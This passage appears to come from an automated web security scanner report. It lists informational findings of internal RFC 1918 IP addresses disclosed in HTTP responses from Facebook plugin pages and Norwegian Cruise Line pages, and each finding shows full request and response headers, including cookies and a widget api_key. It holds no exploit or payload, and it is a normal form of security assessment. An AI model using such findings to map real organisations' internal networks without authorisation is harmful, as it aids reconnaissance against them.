User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.37
X-Cnection: close
Date: Mon, 03 Oct 2011 12:44:40 GMT
Content-Length: 23430

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.34. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DML07A079&dest%3DALCAN&shipCode%3DML&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.209.40
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:23 GMT
Content-Length: 23655

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.35. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39b06e04%26origin%3Dhttp%253A%252F%252Fwww.cruises.com%252Ffe5a763e4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FCruisescom%2F226995804003285&locale=en_US&sdk=joey&show_faces=false&stream=false&width=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.125.45
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:44 GMT
Content-Length: 5601

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
21.36. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17af83be%26origin%3Dhttp%253A%252F%252Fwww.cruises.com%252Ff890277dc%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FCruisescom%2F226995804003285&locale=en_US&sdk=joey&show_faces=false&stream=false&width=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.148.22
X-Cnection: close
Date: Mon, 03 Oct 2011 12:41:19 GMT
Content-Length: 5601

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
21.37. http://www.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2Fpromotion%2Fbermuda-cruises.do%3Ffbc_channel%3D1&id=50243286972&name=&width=180&connections=6&stream=&logobar=&css= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.137.53
X-Cnection: close
Date: Mon, 03 Oct 2011 12:45:27 GMT
Content-Length: 10416

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
21.38. http://www.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2Fpromotion%2Fbermuda-cruises.do%3Ffbc_channel%3D1&id=50243286972&name=&width=180&connections=6&stream=&logobar=&css= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.100.39
X-Cnection: close
Date: Mon, 03 Oct 2011 12:45:27 GMT
Content-Length: 10492

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
21.39. http://www2.ncl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317645008-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Content-Length: 45949
Date: Mon, 03 Oct 2011 12:46:50 GMT
Connection: close
Set-Cookie: Cookie=R4252675302; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:46:50 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:46:50 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.40. http://www2.ncl.com/about/careers/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/careers/overview

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /about/careers/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317630853-1"
Last-Modified: Mon, 03 Oct 2011 08:34:13 +0000
X-Ncl-SLog: 10.5.44.29
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Content-Length: 41424

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.41. http://www2.ncl.com/about/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/contact-us

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /about/contact-us HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317631645-1"
Last-Modified: Mon, 03 Oct 2011 08:47:25 +0000
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Content-Length: 67525

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.42. http://www2.ncl.com/about/environmental-commitment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/environmental-commitment

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /about/environmental-commitment HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 10:33:33 +0000
ETag: "1317638013-1"
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Content-Length: 47797

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.43. http://www2.ncl.com/about/staying-connected-sea-internet-access  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/staying-connected-sea-internet-access

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /about/staying-connected-sea-internet-access HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:03:50 +0000
ETag: "1317647030-1"
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:37 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:37 GMT; path=/; domain=ncl.com
Content-Length: 50010

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
> Yes. Web based email providers are accessed as normal from our onboard system. If you wish to use an email system linked via an external email application, this can be accomplished by using IP 172.31.0.2</p>
...[SNIP]...
21.44. http://www2.ncl.com/cruise-destinations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /cruise-destinations

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /cruise-destinations HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ncl.com/nclweb/cbooking/submitPricingQualifiers.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; Cookie=R4252675302; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.6.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_nr=1317646297776; s_sq=nclcom%3D%2526pid%253Dcbooking%25253A%252520bookingfunnel%25253A%252520cbooking%25253A%252520get%252520started%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww2.ncl.com%25252Fcruise-destinations%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 10:54:49 +0000
ETag: "1317639289-1"
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Content-Length: 60847
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 12:51:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:51:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:51:16 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.45. http://www2.ncl.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /faq

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /faq HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645036-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:05:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Content-Length: 83104

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.46. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/bon-voyage-gifts

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/bon-voyage-gifts HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317637516-1"
Last-Modified: Mon, 03 Oct 2011 10:25:16 +0000
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Content-Length: 60158

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.47. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/casinos-at-sea/overview

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/casinos-at-sea/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317630853-1"
Last-Modified: Mon, 03 Oct 2011 08:34:13 +0000
X-Ncl-SLog: 10.5.44.29
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Content-Length: 43284

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.48. http://www2.ncl.com/freestyle-cruise/cruise-rewards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/cruise-rewards

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/cruise-rewards HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317635166-1"
Last-Modified: Mon, 03 Oct 2011 09:46:06 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:32 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:32 GMT; path=/; domain=ncl.com
Content-Length: 40322

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.49. http://www2.ncl.com/freestyle-cruise/freestyle-accommodations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-accommodations

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/freestyle-accommodations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317633066-1"
Last-Modified: Mon, 03 Oct 2011 09:11:06 +0000
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:45 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:45 GMT; path=/; domain=ncl.com
Content-Length: 43374

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.50. http://www2.ncl.com/freestyle-cruise/freestyle-dining  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-dining

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/freestyle-dining HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317632141-1"
Last-Modified: Mon, 03 Oct 2011 08:55:41 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:43 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:43 GMT; path=/; domain=ncl.com
Content-Length: 47025

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
